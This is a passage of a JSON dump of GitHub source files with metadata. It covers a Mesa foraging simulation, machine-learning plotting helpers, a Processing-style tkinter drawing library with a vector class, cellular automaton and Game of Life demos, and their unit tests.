CanvasGrid(food_portrayal, width, height)\nchart_count = ChartModule([bean, corn, soy, bug])\n\nmodel_params = {\"strategy\": \"stick\"}\nserver = ModularServer(Foraging, [canvas, chart_count], name=\"Foraging\", model_params)\n\nserver.launch()\n"
},
{
"alpha_fraction": 0.5194884538650513,
"alphanum_fraction": 0.5219244956970215,
"avg_line_length": 34.71739196777344,
"blob_id": "0bcbf22863cd6ad91e6e069226709772c76a1b37",
"content_id": "0aca35f1a6f9af2b24eb83f9bfe796a9041f8525",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1642,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 46,
"path": "/foraging/resources.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "import random\n\nfrom mesa.agent import Agent\n\nclass Food(Agent):\n \n fully_grown = False\n \n def __init__(self, unique_id, model, pos=None):\n super().__init__(unique_id, model)\n self.pos = pos\n \n def step(self):\n if self.fully_grown:\n self.energy -= self.wilt_rate\n else:\n self.energy += self.growth_rate\n \n if self.energy >= self.max_growth:\n self.fully_grown = True\n \n # new Food\n if self.fully_grown and (self.energy >= self.max_growth):\n neig = self.model.grid.get_neighborhood(self.pos, True, False)\n is_empty = self.model.grid.is_cell_empty\n \n if any(map(is_empty, neig)):\n empty = list(filter(is_empty, neig))\n pos = random.choice(empty)\n food_name = type(self).__name__.lower()\n attr_name = \"number_of_{}\".format(food_name)\n last = getattr(self.model, attr_name)\n new_food = type(self)(last + 1, self.model)\n self.energy -= new_food.energy\n setattr(self.model, attr_name, last + 1)\n self.model.grid.place_agent(new_food, pos)\n self.model.schedule.add(new_food)\n \n # Death\n if self.energy <= 0:\n food_name = type(self).__name__.lower()\n attr_name = \"number_of_{}\".format(food_name)\n last = getattr(self.model, attr_name)\n self.model.grid._remove_agent(self.pos, self)\n self.model.schedule.remove(self)\n setattr(self.model, attr_name, last - 1)"
},
{
"alpha_fraction": 0.5350318551063538,
"alphanum_fraction": 0.5477706789970398,
"avg_line_length": 18.75,
"blob_id": "050bf4eb8875ee3769d5bd2bfca72b6682342521",
"content_id": "9bce5cf85add1d9b5b1e7f1f0be23a58034bcfdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 8,
"path": "/foraging/utils.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "import math\n\ndef euclidean(u, v):\n \"\"\"The euclidean distance between two points.\"\"\"\n \n x,y = u\n i,j = v\n return math.sqrt((x-i)**2 + (y-j)**2)"
},
{
"alpha_fraction": 0.5085899233818054,
"alphanum_fraction": 0.5228525400161743,
"avg_line_length": 25.60344886779785,
"blob_id": "0475b3a6831097e61cd09a262f03655cb22a6d56",
"content_id": "7c0e9a102c92375ae0a6a7ed3fa439a4e6429442",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3085,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 116,
"path": "/foraging/agents.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "import random\n\nfrom mesa.agent import Agent\n\nfrom foraging.utils import euclidean\nfrom foraging.resources import Food\n\nclass Bug(Agent):\n \n treshold = 15\n metabolism = 1\n energy = 10\n strategy = None\n age = 0\n \n def __init__(self, unique_id, model, pos=None):\n super().__init__(unique_id, model)\n self.pos = pos\n self.move = {\"stick\": self.stick,\n \"switch\": self.switch,\n }\n \n def step(self):\n self.age += 1\n \n adult = self.age > 5\n old = self.age > 50\n \n if old:\n self.energy -= self.metabolism\n \n self.find_food()\n self.move[self.strategy]()\n \n # new Bug\n has_energy = self.energy >= self.treshold\n if has_energy and (adult):\n neig = self.model.grid.get_neighborhood(self.pos, True, False)\n \n if any(map(self.model.grid.is_cell_empty, neig)):\n empty = list(filter(self.model.grid.is_cell_empty, neig))\n pos = random.choice(empty)\n last = self.model.number_of_bug\n new_bug = Bug(last + 1, self.model)\n new_bug.strategy = self.strategy\n self.energy -= new_bug.energy\n self.model.grid.place_agent(new_bug, pos)\n self.model.schedule.add(new_bug)\n self.model.number_of_bug += 1\n else:\n pos = self.model.grid.find_empty()\n self.move_to(pos)\n \n # Death\n if self.energy <= 0:\n self.die()\n \n def switch(self): \n neig = self.model.grid.get_neighborhood(self.pos, True, False)\n pos = random.choice(neig)\n if self.model.grid.is_cell_empty(pos):\n self.move_to(pos)\n \n def stick(self):\n neig = self.model.grid.get_neighbors(self.pos, True)\n if not(neig):\n pos = self.model.grid.find_empty()\n self.move_to(pos)\n \n def move_to(self, pos):\n distance = round(euclidean(self.pos, pos))\n cost = self.metabolism * distance\n \n self.model.grid.move_agent(self, pos)\n self.energy -= cost\n \n def find_food(self):\n neig = self.model.grid.get_neighbors(self.pos, True, False)\n if neig:\n agent = random.choice(neig)\n if isinstance(agent, Food):\n self.eat(agent)\n \n def eat(self, food):\n gain = self.age * self.metabolism\n self.energy += gain\n food.energy -= gain\n \n def die(self):\n self.model.grid._remove_agent(self.pos, self)\n self.model.schedule.remove(self)\n self.model.number_of_bug -= 1\n\nclass Bean(Food):\n \n density = 0.005\n growth_rate = 4\n wilt_rate = 2\n max_growth = 20\n energy = 4\n\nclass Corn(Food):\n \n density = 0.01\n growth_rate = 2\n wilt_rate = 1\n max_growth = 10\n energy = 2\n\nclass Soy(Food):\n \n density = 0.001\n growth_rate = 20\n wilt_rate = 10\n max_growth = 100\n energy = 20"
},
{
"alpha_fraction": 0.7882353067398071,
"alphanum_fraction": 0.7882353067398071,
"avg_line_length": 27.33333396911621,
"blob_id": "0ccb2b6ccab0c241a402cb4d83d67f978c51c15f",
"content_id": "c94e33ec96625eed538a787d4ea151b0b2d04c8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 3,
"path": "/README.md",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "### Adventures in Dataland\n\nThis repository contains code and notebooks for my blog.\n"
},
{
"alpha_fraction": 0.6285714507102966,
"alphanum_fraction": 0.6448979377746582,
"avg_line_length": 31.700000762939453,
"blob_id": "c7317395021808410dfc819d89bd6f3a0c98d96b",
"content_id": "031fd87b7a3af2d1d35c36729cd22910606e2d69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 980,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 30,
"path": "/utils.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "def display_confusion_matrix(true, pred, labels=None, tablefmt=\"rst\"):\n import tabulate\n from sklearn.metrics import confusion_matrix\n \n cm = confusion_matrix(true, pred, labels=labels)\n data = [[k]+list(v) for k,v in enumerate(cm)]\n data.insert(0, list(labels))\n return tabulate.tabulate(data, headers=\"firstrow\", tablefmt=tablefmt)\n\ndef plot_misclass(x,true,pred,a=0,b=5):\n import matplotlib.pyplot as plt\n \n misclass = x[(true==a)&(pred==b)][:10]\n\n fig,axes = plt.subplots(nrows=2, ncols=5, figsize=(8,5))\n\n fig.suptitle(\"Some {} that were misclassified as {}\".format(a,b), fontsize=15)\n for ax,d in zip(fig.axes,misclass):\n d = d.reshape((28,28))\n ax.imshow(d, cmap=plt.cm.Greys)\n\ndef count(arr):\n from numpy import array\n from collections import defaultdict\n \n tab = defaultdict(int)\n for elt in arr:\n tab[elt] += 1\n keys,vals = zip(*tab.items()) \n return array(keys, dtype=int), array(vals)"
}
] | 7 |
rpalo/pyprocessing
|
https://github.com/rpalo/pyprocessing
|
b7c6de68e8d38c737e7f5d9538f6c8eeba3ce9fd
|
248d72a05f41d7e75fd2cd3bf84caa3ba63e216b
|
c282e7f3f8357b76e13dd4ba7b7029c87477f57c
|
refs/heads/master
| 2021-01-10T04:29:43.816345 | 2016-04-08T06:20:41 | 2016-04-08T06:20:41 | 55,466,880 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6270173192024231,
"alphanum_fraction": 0.6473401188850403,
"avg_line_length": 21.594594955444336,
"blob_id": "a25db884bc0938bc221c57eeabf671f5bb0dd721",
"content_id": "18d41c80b56e3d71fc4313a256dd42c7c055264b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1673,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 74,
"path": "/CA1.py",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "from pyprocessing import Plotter\nimport sys\n\n\"\"\"This module is just an example use case for pyprocessing.\nIt generates a 1-dimensional Cellular Automaton animation.\nCheck out rule 90, and several in the 100-120 range.\"\"\"\n\n\nclass CA:\n\n\tdef __init__(self, plot, resolution=10, rule=90):\n\t\tself.cells = []\n\t\tself.ruleset = self.get_ruleset(rule)\n\t\tprint(self.ruleset)\n\t\tself.resolution = resolution\n\t\tself.plot = plot\n\t\tfor i in range(int(self.plot.width/self.resolution)):\n\t\t\tself.cells.append(0)\n\t\tself.cells[int(len(self.cells)/2)] = 1\n\t\tself.generation = 0\n\n\tdef generate(self):\n\t\tnextgen = []\n\t\tnextgen.append(0)\n\t\tfor i in range(1, len(self.cells)-1):\n\t\t\tleft = self.cells[i-1]\n\t\t\tme = self.cells[i]\n\t\t\tright = self.cells[i+1]\n\t\t\tnextgen.append(self.rules(left, me, right))\n\t\tnextgen.append(0)\n\t\tself.cells = nextgen\n\t\tself.generation += 1\n\n\tdef rules(self, a, b, c):\n\t\ts = \"%d%d%d\" % (a, b, c)\n\t\tindex = int(s, 2)\n\t\treturn self.ruleset[index]\n\n\tdef display_row(self):\n\t\tfor i in range(len(self.cells)):\n\t\t\tif self.cells[i] == 1:\n\t\t\t\tself.plot.fill('black')\n\t\t\telse:\n\t\t\t\tself.plot.fill('white')\n\t\t\tself.plot.rect(i*self.resolution,\n\t\t\t\t\t\t\tself.generation*self.resolution,\n\t\t\t\t\t\t\tself.resolution,\n\t\t\t\t\t\t\tself.resolution)\n\n\tdef get_ruleset(self, rule):\n\t\truleset = [int(x) for x in bin(rule)[2:]]\n\t\twhile len(ruleset) < 8:\n\t\t\truleset.insert(0, 0)\n\t\treturn ruleset[::-1]\n\nclass CAPlot(Plotter):\n\n\tdef setup(self):\n\t\tself.CA.display_row()\n\n\tdef draw(self):\n\t\tself.CA.generate()\n\t\tself.CA.display_row()\n\n\n\nif __name__ == '__main__':\n\tp = CAPlot()\n\tif len(sys.argv) > 1:\n\t\tca = CA(resolution=5,plot=p, rule=int(sys.argv[1]))\n\telse:\n\t\tca = CA(plot=p)\n\tp.CA = ca\n\tp.mainloop()\n\n"
},
{
"alpha_fraction": 0.6087671518325806,
"alphanum_fraction": 0.6268492937088013,
"avg_line_length": 22.088607788085938,
"blob_id": "0672597031742376c72e678fff0846fad6991870",
"content_id": "edaa9d2206eed7645358c890aa2c148bf8b188c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1825,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 79,
"path": "/gol.py",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "from pyprocessing import Plotter\nimport random\n\nclass Cell:\n\n\tdef __init__(self, x, y, w, plot,board):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.w = w\n\t\tself.plot = plot \n\t\tself.board = board\n\t\tself.state = 0\n\t\tself.previous = 0\n\n\tdef display(self):\n\t\tif self.previous == 0 and self.state == 1:\n\t\t\tself.plot.fill('blue')\n\t\telif self.state == 1:\n\t\t\tself.plot.fill('black')\n\t\telif self.previous == 1 and self.state == 0:\n\t\t\tself.plot.fill('red')\n\t\telse:\n\t\t\tself.plot.fill('white')\n\t\tself.plot.rect(self.x*self.w, self.y*self.w, self.w, self.w)\n\n\tdef update(self):\n\t\tneighbors = 0\n\t\tfor i in range(-1, 2):\n\t\t\tfor j in range(-1, 2):\n\t\t\t\tneighbors += self.board[self.x+i][self.y+j].previous\n\t\tneighbors -= self.board[self.x][self.y].previous\n\t\tif self.previous == 1 and neighbors < 2:\n\t\t\tself.state = 0\n\t\telif self.previous == 1 and neighbors > 3:\n\t\t\tself.state = 0\n\t\telif self.previous == 0 and neighbors == 3:\n\t\t\tself.state = 1\n\nclass Game:\n\n\tdef __init__(self, plot, w=10):\n\t\tself.w = w\n\t\tself.plot = plot\n\t\tself.rows = int(self.plot.width/self.w)\n\t\tself.cols = int(self.plot.height/self.w)\n\t\tself.board = []\n\t\tfor j in range(self.rows):\n\t\t\tself.board.append([])\n\t\t\tfor i in range(self.cols):\n\t\t\t\tnewCell = Cell(i, j, w, self.plot, self.board)\n\t\t\t\tnewCell.previous = random.randint(0,1)\n\t\t\t\tself.board[j].append(newCell)\n\n\tdef display(self):\n\t\tfor j in range(1,self.rows-1):\n\t\t\tfor i in range(1,self.cols-1):\n\t\t\t\tself.board[j][i].display()\n\t\t\t\tself.board[j][i].previous = self.board[j][i].state\n\n\tdef update(self):\n\t\tfor j in range(1,self.rows-1):\n\t\t\tfor i in range(1, self.cols-1):\n\t\t\t\tself.board[j][i].update()\n\nclass gamePlotter(Plotter):\n\n\tdef setup(self):\n\t\tpass\n\n\tdef draw(self):\n\t\tself.clear()\n\t\tself.game.update()\n\t\tself.game.display()\n\nif __name__ == '__main__':\n\tp = gamePlotter()\n\tg = Game(plot=p)\n\tp.game = g\n\tp.mainloop()\n\n"
},
{
"alpha_fraction": 0.6584981083869934,
"alphanum_fraction": 0.6638005375862122,
"avg_line_length": 27.950206756591797,
"blob_id": "a824265c2d6c796edc332bc7d3ff0575fa4aa379",
"content_id": "c016c56ef147bfa6ad61eece0cc6f5c84e56daa3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6978,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 241,
"path": "/pyprocessing.py",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\nfrom math import sin, asin, cos, acos, tan, atan2, radians, degrees, pi, sqrt\n\nclass Plotter:\n\t\"\"\"Main controller class. Basically simulates a processing\n\twindow and provides the interfaces to the tkinter inner workings.\n\tNot sure if this is the best way to go on this yet.\"\"\"\n\n\tdef __init__(self, width=600, height=600, timestep=100):\n\t\tself.root = tk.Tk()\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.timestep = timestep\n\t\tself.canvas = tk.Canvas(self.root,\n\t\t\t\t\t\t\t\twidth=self.width,\n\t\t\t\t\t\t\t\theight=self.height)\n\t\tself.canvas.pack()\n\t\tself.frame = 0\n\t\tself.matrix = {\n\t\t\t\"linecolor\": \"black\",\n\t\t\t\"fill\": \"\",\n\t\t\t\"origin_x\": 0,\n\t\t\t\"origin_y\": 0,\n\t\t\t\"rotation\": 0,\n\t\t\t\"linewidth\": 2,\n\t\t}\n\t\tself.matrixStack = []\n\n\tdef setup(self):\n\t\t\"\"\"Sets up the window before the first frame goes.\n\t\tTo be implemented in all subclasses\"\"\"\n\t\t\n\t\traise NotImplementedError(\"Setup method was not set\")\n\n\tdef draw(self):\n\t\t\"\"\"This function to be run once per frame, drives the animation.\n\t\tTo be implemented in all subclasses. If it isn't, animation will\n\t\tstop\"\"\"\n\n\t\traise NotImplementedError(\"Draw method was not set\")\n\n\tdef _animate(self):\n\t\t\"\"\"Main animation mechanics for draw loop\"\"\"\n\t\ttry:\n\t\t\tself.draw()\n\t\texcept NotImplementedError:\n\t\t\treturn False\n\t\tself.root.after(self.timestep, self._animate)\n\t\tself.frame += 1\n\n\tdef _toGlobal(self, x_local, y_local):\n\t\t\"\"\"Converts local x, y to global x, y.\n\t\tReturns tuple of pixel coords.\"\"\"\n\t\ttheta = radians(self.matrix[\"rotation\"])\n\t\tx_global = self.matrix[\"origin_x\"] + x_local*cos(theta) + y_local*sin(theta)\n\t\ty_global = self.matrix[\"origin_y\"] + y_local*cos(theta) - x_local*sin(theta)\n\t\treturn x_global, y_global\n\n\n\tdef rect(self, x, y, width, height):\n\t\t\"\"\"Draws a rectangle with top-left corner at x, y. Returns id\n\t\tof object\"\"\"\n\n\t\tlocal_points = [(x, y), (x+width, y), (x+width, y+height), (x, y+height)]\n\t\tglobal_points = []\n\t\tfor _x, _y in local_points:\n\t\t\tglobal_points.append(self._toGlobal(_x, _y))\n\n\t\treturn self.canvas.create_polygon(\n\t\t\t\t\t\t\t\toutline=self.matrix[\"linecolor\"],\n\t\t\t\t\t\t\t\tfill=self.matrix[\"fill\"],\n\t\t\t\t\t\t\t\twidth=self.matrix[\"linewidth\"],\n\t\t\t\t\t\t\t\t*global_points)\n\n\tdef oval(self, x, y, width, height, resolution=20):\n\t\t\"\"\"Draws an oval with top-left corner at x, y. Returns id of object\"\"\"\n\t\tglobal_points = []\n\t\ttheta = 0\n\t\ttheta_step = 2*pi/resolution\n\t\ta = width/2\n\t\tb = height/2\n\t\txc = x + a\n\t\tyc = y + b\n\t\tfor i in range(resolution):\n\t\t\ttheta = theta + theta_step\n\t\t\tx1 = a*cos(theta) + xc \n\t\t\ty1 = b*sin(theta) + yc \n\t\t\tglobal_points.append(self._toGlobal(x1, y1))\n\n\t\treturn self.canvas.create_polygon(\n\t\t\t\t\t\t\t\toutline=self.matrix[\"linecolor\"],\n\t\t\t\t\t\t\t\tfill=self.matrix[\"fill\"],\n\t\t\t\t\t\t\t\twidth=self.matrix[\"linewidth\"],\n\t\t\t\t\t\t\t\t*global_points)\n\n\tdef circle(self, x, y, r, resolution=20):\n\t\t\"\"\"Draws a circle (width = height) with center at x, y. Returns\n\t\tid of object\"\"\"\n\t\treturn self.oval(x-r, y-r, 2*r, 2*r, resolution)\n\n\tdef clear(self):\n\t\t\"\"\"Clears the whole canvas out\"\"\"\n\t\tself.canvas.delete(\"all\")\n\n\tdef background(self, color):\n\t\t\"\"\"Sets the background color of the canvas\"\"\"\n\t\tself.canvas.configure(background=color)\n\n\tdef fill(self, color):\n\t\t\"\"\"Sets the active fill to the current color\"\"\"\n\t\tself.matrix[\"fill\"] = color\n\n\tdef pushMatrix(self):\n\t\t\"\"\"Saves the current major settings for unpacking later\"\"\"\n\t\tself.matrixStack.append(self.matrix.copy())\n\n\tdef popMatrix(self):\n\t\t\"\"\"Pops a matrix off of the stack, restoring those settings\"\"\"\n\t\tself.matrix = self.matrixStack.pop()\n\n\tdef translate(self, x, y):\n\t\t\"\"\"Translates the origin to a proscribed x, y point\"\"\"\n\t\tself.matrix[\"origin_x\"] += x \n\t\tself.matrix[\"origin_y\"] += y\n\n\tdef rotate(self, theta):\n\t\t\"\"\"Rotates the origin reference frame by theta degrees.\n\t\tTheta zero is positive x axis, positive theta is ccw\"\"\"\n\t\tself.matrix[\"rotation\"] = theta\n\n\tdef stroke(self, **kwargs):\n\t\t\"\"\"Takes in some stroke variables and sets them. Possible inputs:\n\t\twidth = sets the line width\n\t\tcolor = sets the pen color\"\"\"\n\t\tif \"width\" in kwargs:\n\t\t\tself.matrix[\"linewidth\"] = kwargs[\"width\"]\n\t\tif \"color\" in kwargs:\n\t\t\tself.matrix[\"linecolor\"] = kwargs[\"color\"]\n\n\tdef mainloop(self):\n\t\t\"\"\"Runs the mainloop of the animation\"\"\"\n\n\t\tself.setup()\n\t\tself.root.after(0, self._animate)\n\t\tself.root.mainloop()\n\nclass PVector:\n\t\"\"\"Python implementation of Processing's PVector class, which is\n\t(until I learn differently), basically a vector. One might call\n\tthis one a... PYVector. Heh. Essentially it has an x and y component\n\twhich can be converted back and forth to angle and magnitude. \n\tVarious supporting mathematical functions ensue. I know that\n\tthere is most definitely already a python implementation of a vector\n\tout there and that it is probably way better than this, but\n\tI'm making this one for fun.\"\"\"\n\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef __str__(self):\n\t\treturn \"<%f, %f>\" % (self.x, self.y)\n\n\tdef __repr__(self):\n\t\treturn \"<PVector: (%f, %f)>\" % (self.x, self.y)\n\n\tdef __add__(self, other):\n\t\tif isinstance(other, PVector):\n\t\t\treturn PVector(self.x + other.x, self.y + other.y)\n\t\telse:\n\t\t\treturn PVector(self.x + other,self.y + other)\n\n\tdef __sub__(self, other):\n\t\tif isinstance(other, PVector):\n\t\t\treturn PVector(self.x - other.x, self.y - other.y)\n\t\telse:\n\t\t\treturn PVector(self.x - other, self.y - other)\n\n\tdef __mul__(self, other):\n\t\tif isinstance(other, PVector):\n\t\t\treturn self.dot(other)\n\t\telse:\n\t\t\treturn PVector(self.x * other, self.y * other)\n\n\tdef __div__(self, other):\n\t\treturn PVector(self.x / other, self.y / other)\n\n\tdef __neg__(self, other):\n\t\treturn PVector(-self.x, -self.y)\n\n\tdef cross(self, other):\n\t\t\"\"\"Returns the cross product of self and other. \n\t\tObviously since these are all 2D, cross product will\n\t\tbe in Z dimension only. Return value is a floating\n\t\tpoint number, in the k dimension\"\"\"\n\n\t\treturn (self.x * other.y) - (self.y * other.x)\n\n\tdef dot(self, other):\n\t\t\"\"\"Returns the dot product of self and other\"\"\"\n\n\t\treturn self.x * other.x + self.y * other.y\n\n\tdef mag(self):\n\t\t\"\"\"Returns the vectors magnitude\"\"\"\n\t\treturn sqrt(self.x**2 + self.y**2)\n\n\tdef theta(self, degree=True):\n\t\t\"\"\"Returns the vector's angle\"\"\"\n\t\tif degree:\n\t\t\treturn degrees(atan2(self.y, self.x))\n\t\telse:\n\t\t\treturn atan2(self.y, self.x)\n\n\tdef setMag(self, magnitude):\n\t\t\"\"\"Sets this vectors magnitude at same angle\"\"\"\n\t\tmag = self.mag()\n\t\ttheta = self.theta(degree=False)\n\t\tself.x = magnitude*cos(theta)\n\t\tself.y = magnitude*sin(theta)\n\n\tdef scale(self, factor):\n\t\t\"\"\"Scales this vector's magnitude by a certain factor\n\t\twhile keeping the angle the same.\"\"\"\n\n\t\tself.setMag(factor*self.mag())\n\n\tdef norm(self):\n\t\t\"\"\"Scales self to unit vector\"\"\"\n\t\tself.setMag(1)\n\n\tdef rotate(self, angle):\n\t\t\"\"\"Rotates vector by angle degrees. Positive theta ccw\"\"\"\n\t\ttheta = self.theta(degree=False)\n\t\ttheta += radians(angle)\n\t\tmag = self.mag()\n\t\tself.x = mag*cos(theta)\n\t\tself.y = mag*sin(theta)\n\n\tdef get_angle_between(self, other):\n\t\treturn degrees(acos(self.dot(other)/(self.mag()*other.mag())))\n\n"
},
{
"alpha_fraction": 0.5756630301475525,
"alphanum_fraction": 0.6365054845809937,
"avg_line_length": 18.439393997192383,
"blob_id": "1d987550a4b96f7e82e8d34646fb048efa5645d7",
"content_id": "1eb5298a1402b39568a70902f801816a019eb4ff",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1282,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 66,
"path": "/test_plotter.py",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "import pyprocessing as proc \n\nclass TestPlotDude(proc.Plotter):\n\n\tdef setup(self):\n\t\t\"\"\"Adds a test setup method\"\"\"\n\n\t\td.display()\n\n\tdef draw(self):\n\t\t\"\"\"Adds a test draw method\"\"\"\n\n\t\tself.clear()\n\t\td.update()\n\t\td.display()\n\nclass TestPlotSimple(proc.Plotter):\n\n\tdef setup(self):\n\t\tself.stroke(color='red')\n\t\tself.rect(100, 100, 100, 50)\n\t\tself.pushMatrix()\n\t\tself.translate(200, 200)\n\t\tself.rotate(15)\n\t\tself.stroke(color='black')\n\t\tself.rect(0,0,100, 50)\n\t\tself.oval(100, 100, 50, 40, 50)\n\t\tself.circle(50, 50, 200)\n\t\tself.popMatrix()\n\t\tself.rect(0, 0, 100, 50)\n\n\n\nclass Dude:\n\t\"\"\"Little autonomous dude for testing\"\"\"\n\n\tdef __init__(self, plot):\n\t\tself.x = plot.width/2\n\t\tself.y = 0\n\t\tself.vx = 0\n\t\tself.vy = 1\n\t\tself.ay = 1\n\t\tself.plot = plot\n\t\n\tdef update(self):\n\t\t\"\"\"Updates all of the little dude's properties at each timestep\"\"\"\n\t\tself.x += self.vx\n\t\tself.vy += self.ay\n\t\tself.y += self.vy\n\n\tdef display(self):\n\t\t\"\"\"Displays the little dude\"\"\"\n\t\tself.plot.pushMatrix()\n\t\tself.plot.translate(self.x, self.y)\n\t\tself.plot.fill('yellow')\n\t\tself.plot.circle(0, 0, 30)\n\t\tself.plot.fill('black')\n\t\tself.plot.circle(-10, -10, 5)\n\t\tself.plot.circle(10, -10, 5)\n\t\tself.plot.rect(-10, 0, 20, 10)\n\t\tself.plot.popMatrix()\n\nif __name__ == '__main__':\n\tt = TestPlotSimple()\n\t\n\tt.mainloop()"
},
{
"alpha_fraction": 0.7057877779006958,
"alphanum_fraction": 0.7122186422348022,
"avg_line_length": 46.769229888916016,
"blob_id": "8876129a3e1b74e48219b878912ce96801e9b1c0",
"content_id": "653fdabea491caae1ea9804e26a96941231ff7de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 622,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 13,
"path": "/ideas.md",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "# Ideas for the project\n\n- [x] Basic Functionality: Setup, Draw, Rect, Oval, Circle\n- [x] Make some tests that run as if it's being used.\n- [ ] Figure out best way to interface with it\n- [x] Play with it using the Nature of Code book\n- [ ] Incorporate decorators?\n- [ ] Manage upside down x, y axes?\n- [ ] Implement center modes for rect and oval?\n- [x] Figure out whether or not I want to permit kwargs for pass throughs\n- [x] Implement Rotate, more advanced function for x0, y0, x1, y1 calcs (sine/cos, etc)\n- [x] Implement PVectors\n- [x] Write actual test cases for PVectors, which are a little easier to test casify.\n\n"
},
{
"alpha_fraction": 0.6005138158798218,
"alphanum_fraction": 0.6480411291122437,
"avg_line_length": 24.09677505493164,
"blob_id": "c5f68326878d541faee3e2f031ff6ff0dd566909",
"content_id": "e0b8405142b40b0de26dd280ed812b7792f11d41",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1557,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 62,
"path": "/test_pvector.py",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "from pyprocessing import PVector\nimport unittest\n\nclass TestPVectorMethods(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.A = PVector(1, 0)\n\t\tself.B = PVector(0, 5)\n\t\tself.C = PVector(3,4)\n\t\tself.D = PVector(4, 4)\n\n\tdef test_cross(self):\n\t\t# <1, 0> x <0, 5> = 5 - 0 = 5\n\t\tself.assertEqual(self.A.cross(self.B), 5)\n\t\t# switching order should be inverse\n\t\tself.assertEqual(self.B.cross(self.A), -5)\n\n\tdef test_dot(self):\n\t\t# <3, 4> * <4, 4> = 3*4 + 4*4 = 12 + 16 = 28\n\t\tself.assertEqual(self.C.dot(self.D), 28)\n\n\tdef test_mag(self):\n\t\t# sqrt(3**2 + 4**2) = 5\n\t\tself.assertEqual(self.C.mag(), 5)\n\n\tdef test_theta(self):\n\t\tself.assertEqual(self.A.theta(), 0)\n\t\tself.assertEqual(self.B.theta(), 90)\n\t\tself.assertEqual(self.D.theta(), 45)\n\n\tdef test_theta_radians(self):\n\t\t# 45 degrees is pi/4\n\t\tself.assertAlmostEqual(self.D.theta(degree=False),\n\t\t\t\t\t\t\t\t3.14159/4.0, places=2)\n\n\tdef test_setMag(self):\n\t\tself.A.setMag(self.B.mag())\n\t\tself.assertEqual(self.A.mag(), self.B.mag())\n\n\tdef test_scale(self):\n\t\tself.B.scale(2)\n\t\t# 2 * 5 is 10\n\t\tself.assertEqual(self.B.mag(), 10)\n\t\tself.B.scale(-2)\n\t\t# opposite length is still length\n\t\tself.assertEqual(self.B.mag(), 20)\n\n\tdef test_norm(self):\n\t\tself.C.norm()\n\t\tself.assertEqual(self.C.mag(), 1)\n\n\tdef test_rotate(self):\n\t\tself.A.rotate(90)\n\t\tself.assertEqual(self.A.theta(), self.B.theta())\n\n\tdef test_angle_between(self):\n\t\tself.A.x, self.A.y = 0, 1\n\t\tself.assertEqual(self.A.get_angle_between(self.B), 0)\n\t\tself.assertAlmostEqual(self.D.get_angle_between(self.A), 45)\n\nif __name__ == '__main__':\n\tunittest.main()\n\n"
}
] | 6 |
angelip2303/config
|
https://github.com/angelip2303/config
|
5e00900d8df6ac1fdb04e85769632bc74db4a6ec
|
1e6753287b59a3b99177a13d0af6ec109f8deacf
|
d5344124b9d52f1392d7f88a728e5ff55fe47c34
|
refs/heads/master
| 2022-11-06T22:31:46.792929 | 2020-07-28T21:39:49 | 2020-07-28T21:39:49 | 265,946,966 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.55633544921875,
"alphanum_fraction": 0.58111572265625,
"avg_line_length": 21.112010955810547,
"blob_id": "fcc030193ebdf5de125b1594de484f09c8cb5fcb",
"content_id": "4278dc308d17199aa41ae68725f1ed15c7b618b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 16548,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 741,
"path": "/my-polybar/modules.ini",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
